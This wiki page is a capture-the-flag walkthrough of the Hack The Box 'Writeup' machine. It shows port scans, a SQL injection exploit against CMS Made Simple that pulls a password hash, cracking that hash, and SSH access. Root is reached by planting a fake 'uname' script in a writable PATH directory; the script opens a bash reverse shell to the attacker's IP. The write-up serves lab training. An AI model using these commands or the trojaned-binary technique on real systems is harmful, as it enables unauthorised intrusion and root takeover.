Writeup

From Luniwiki
Jump to: navigation, search

Back

Writeup01.png

Ports scan

u505@kali:~/HTB/Machines/Writeup$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.138 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-25 13:03:47 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.138 Discovered open port 22/tcp on 10.10.10.138
u505@kali:~/HTB/Machines/Writeup$ nmap -sC -sV 10.10.10.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 08:01 EST
Nmap scan report for writeup.htb (10.10.10.138)
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.29 seconds

Web

The web is a geek style site, but there is a warning, that a DoS script ban ip's that returns too many 40x errors. We cannot run a web enumeration.

Writeup02.png

u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb
<html lang="en_US">
 <head><title>Nothing here yet.</title><style>.footer { background-color: #A0A0FF; position: fixed; left: 0; bottom: 0; width: 100%; color: black; text-align: center; }</style></head>
 <body bgcolor="#4040E0">
 <center><pre>
 <font color="#FF6666">
 ########################################################################
 #                                                                      #
 #           *** NEWS *** NEWS *** NEWS *** NEWS *** NEWS ***           #
 #                                                                      #
 #   Not yet live and already under attack. I found an   ,~~--~~-.      #
 #   Eeyore DoS protection script that is in place and   +      | |\    #
 #   watches for Apache 40x errors and bans bad IPs.     || |~ |`,/-\   #
 #   Hope you do not get hit by false-positive drops!    *\_) \_) `-'   #
 #                                                                      #
 #   If you know where to download the proper Donkey DoS protection     #
 #   please let me know via mail to jkr@writeup.htb - thanks!           #
 #                                                                      #
 ########################################################################
 </font>
 <b>
 <font color="#A0A0FF">
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 88888888888888888888888888888888888888888888888888888
 8888"""""""""""""""8888888888888888888888888888888888
 8888               8888888888888888888888888888888888
 8888  HTB NOTES    8888888888888888888888888888888888
 8888               888888888888888888888888888888888"
 8888aaaaaaaaaaaaaaa888888888888888888888888888888888a
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888":::::"88888888888888888888888
 888888888888888888888::;gPPRg;::888888888888888888888
 88888888888888888888::dP'   `Yb::88888888888888888888
 88888888888888888888::8)     (8::88888888888888888888
 88888888888888888888;:Yb     dP:;88( )888888888888888
 888888888888888888888;:"8ggg8":;888888888888888888888
 88888888888888888888888aa:::aa88888888888888888888888
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888888"88888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 88888888888888888888888888a88888888888888888888888888
 """""""""""""""""""' `"""""""""' `"""""""""""""""""""
                               (c) by Normand Veilleux
 <br>
 <br>
 I am still searching through my backups so there is
 nothing here yet. I am preparing go-live of my own
 www.hackthebox.eu write-up page soon. Stay tuned!
 <br>
 <br>
 <br>
 <br>
 <br>
 <br>
 </pre></center></b>
 <div class="footer"><p><pre>Page is hand-crafted with vi.</pre></p></div>
 </body>
 </html>

Robots.txt

The robots file give us a clue about URL to visit (Nmap found iit too).

u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb/robots.txt
#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `------`

# Disallow access to the blog until content is finished. User-agent: * Disallow: /writeup/

/writeup/

Writeup03.png The CMS is CMS Made Simple.

u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb/writeup/
<!doctype html>
 <html lang="en_US"><head>
         <title>Home - writeup</title>
 <base href="http://writeup.htb/writeup/" />
 <meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
         <!-- cms_stylesheet error: No stylesheets matched the criteria specified -->
 <style>.footer { background-color: white; position: fixed; left: 0; bottom: 0; width: 100%; color: black; text-align: center; }</style>
 </head><body>
         <header id="header">
                 <h1>writeup</h1>
         </header>
         <nav id="menu">
 <ul><li class="currentpage"><a class="currentpage" href="http://writeup.htb/writeup/">Home Page</a></li><li><a href="http://writeup.htb/writeup/index.php?page=ypuffy">ypuffy</a></li><li><a href="http://writeup.htb/writeup/index.php?page=blue">blue</a></li><li><a href="http://writeup.htb/writeup/index.php?page=writeup">writeup</a></li></ul>
         </nav>
         <section id="content">
                 <h1>Home</h1>
                 <p>After many month of lurking around on HTB I also decided to start writing about the boxes I hacked. In the upcoming days, weeks and month you will find more and more content here as I am about to convert my famous incomplete notes into pretty write-ups.</p>
 <p>I am still searching for someone to provide or make a cool theme. If you are interested, please contact me on <a href="https://mm.netsecfocus.com/">NetSec Focus Mattermost</a>. Thanks.</p>    </section>
 <div class="footer">
   <p>Pages are hand-crafted with vim. NOT.</p>
 </div>
 </body>
 </html>

The copyright is from 2019, and the machine was released on June 2019. So version can only be 2.2.9, 2.2.9.1 or 2.2.10. (http://dev.cmsmadesimple.org/project/files/6)

Writeup04.png

u505@kali:~/HTB/Machines/Writeup$ searchsploit CMS Made Simple
-------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                |  Path
                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code E | exploits/php/remote/46627.rb
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion       | exploits/php/webapps/26217.html
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting       | exploits/php/webapps/26298.txt
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting    | exploits/php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection        | exploits/php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulne | exploits/php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities             | exploits/php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                   | exploits/php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection          | exploits/php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upl | exploits/php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                  | exploits/php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                 | exploits/php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scr | exploits/php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities              | exploits/php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery              | exploits/php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | exploits/php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Reque | exploits/php/webapps/34068.html
CMS Made Simple 2.1.6 - Multiple Vulnerabilities              | exploits/php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                 | exploits/php/webapps/44192.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | exploits/php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | exploits/php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoni | exploits/php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                      | exploits/php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upl | exploits/php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary Fil | exploits/php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbi | exploits/php/webapps/46546.py
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Writeup$ searchsploit -m 46635
  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Writeup/46635.py

This exploit is an time based SQL injection. It allows to find username, email, salt and password hashed.

u505@kali:~/HTB/Machines/Writeup$ python 46635.py -u http://10.10.10.138/writeup/
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

We create the hashfile for hashcat

u505@kali:~/HTB/Machines/Writeup$ cat hash.txt
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807

And we bruteforce it with hashcat.

u505@kali:~/HTB/Machines/Writeup$ hashcat --force -m 20 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Writeup$ hashcat --force -m 20 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9

User Flag

With the user and password, we can ssh into the server.

u505@kali:~/HTB/Machines/Writeup$ ssh jkr@writeup.htb
The authenticity of host 'writeup.htb (10.10.10.138)' can't be established.
ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'writeup.htb,10.10.10.138' (ECDSA) to the list of known hosts.
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. jkr@writeup:~$ cat user.txt <USER_FLAG>

Local enumeration

u505@kali:~/HTB/Machines/Writeup/www$ ls -ltr
total 3056
-rw-r--r-- 1 u505 u505   46631 Feb  9 21:32 LinEnum.sh
-rw-r--r-- 1 u505 u505 3078592 Feb  9 21:32 pspy64
u505@kali:~/HTB/Machines/Writeup/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

From the target server

jkr@writeup:~$ cd /tmp/
jkr@writeup:/tmp$ wget -q http://10.10.14.30/pspy64
jkr@writeup:/tmp$ wget -q http://10.10.14.30/LinEnum.sh
jkr@writeup:/tmp$ chmod +x pspy64 LinEnum.sh

The LinEnum.sh doesn't give us any clue how to escalate privileges.

2020/02/25 09:27:01 CMD: UID=0    PID=2502   | /usr/sbin/CRON
2020/02/25 09:27:01 CMD: UID=0    PID=2503   | /usr/sbin/CRON
2020/02/25 09:27:01 CMD: UID=0    PID=2504   | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1

There is a job task, but we cannot access the file cleanup.pl

ssh login

When we start an ssh session the following command are executed

2020/02/25 09:27:27 CMD: UID=0    PID=2506   | sshd: [accepted]
2020/02/25 09:27:27 CMD: UID=0    PID=2507   | sshd: [accepted]
2020/02/25 09:27:35 CMD: UID=0    PID=2508   | sshd: jkr [priv]
2020/02/25 09:27:35 CMD: UID=0    PID=2509   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2020/02/25 09:27:35 CMD: UID=0    PID=2510   | run-parts --lsbsysinit /etc/update-motd.d
2020/02/25 09:27:35 CMD: UID=0    PID=2511   | uname -rnsom
2020/02/25 09:27:35 CMD: UID=0    PID=2512   | sshd: jkr [priv]
2020/02/25 09:27:35 CMD: UID=1000 PID=2513   | -bash
2020/02/25 09:27:35 CMD: UID=1000 PID=2514   | -bash
2020/02/25 09:27:35 CMD: UID=1000 PID=2515   | -bash
2020/02/25 09:27:36 CMD: UID=1000 PID=2516   | -bash
2020/02/25 09:27:36 CMD: UID=1000 PID=2517   | -bash

In the folder /etc/update-motd.d/ we found the file 10-uname

jkr@writeup:~$ ls -l /etc/update-motd.d/
total 4
-rwxr-xr-x 1 root root 23 Jun  3  2018 10-uname
jkr@writeup:~$ cat /etc/update-motd.d/10-uname
#!/bin/sh
uname -rnsom
jkr@writeup:~$ uname -rnsom
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

We cannot change the file 10-uname

jkr@writeup:~$ whereis uname
uname: /bin/uname /usr/share/man/man1/uname.1.gz

The command uname is located in /bin/ Our user is on group staff

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

These are the folder in the PATH environment detected by pspy

jkr@writeup:~$ ls -ld /usr/local/sbin/
drwx-wsr-x 2 root staff 12288 Apr 19  2019 /usr/local/sbin/
jkr@writeup:~$ ls -ld /usr/local/bin/
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin/
jkr@writeup:~$ ls -ld /usr/sbin/
drwxr-xr-x 2 root root 4096 Aug 23  2019 /usr/sbin/
jkr@writeup:~$ ls -ld /usr/bin/
drwxr-xr-x 2 root root 20480 Aug 23  2019 /usr/bin/
jkr@writeup:~$ ls -ld /sbin/
drwxr-xr-x 2 root root 4096 Aug 23  2019 /sbin/
jkr@writeup:~$ ls -ld /bin/
drwxr-xr-x 2 root root 4096 Apr 19  2019 /bin/

The strategy is to create a new uname command that opens a reverse shell as root

Escalation of Privileges

jkr@writeup:/tmp$ cat uname
#!/bin/bash
VAR=$*
/bin/bash -i >& /dev/tcp/10.10.14.30/4444 0>&1 &
/bin/uname $VAR

We raise the listener

u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

If we execute our new uname script, it returns the uname command, but at the same time opens a reverse shell.

jkr@writeup:/tmp$ ./uname -a
Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.138.
Ncat: Connection from 10.10.10.138:40656.

Now, if we copy our "uname" version in /usr/local/bin/, our uname command should be executed before the real uname command

jkr@writeup:/tmp$ cp uname /usr/local/bin/

When we login from another console, our uname command will open a reverse shell as root

u505@kali:~/HTB/Machines/Writeup$ ssh jkr@writeup.htb
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
...

Our reverse shell is opened.

u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.138.
Ncat: Connection from 10.10.10.138:40658.
bash: cannot set terminal process group (3145): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# whoami
whoami
root

Root flag

root@writeup:/# cat /root/root.txt
cat /root/root.txt
<ROOT Flag>

References

Daniel Simao 08:00, 25 February 2020 (EST)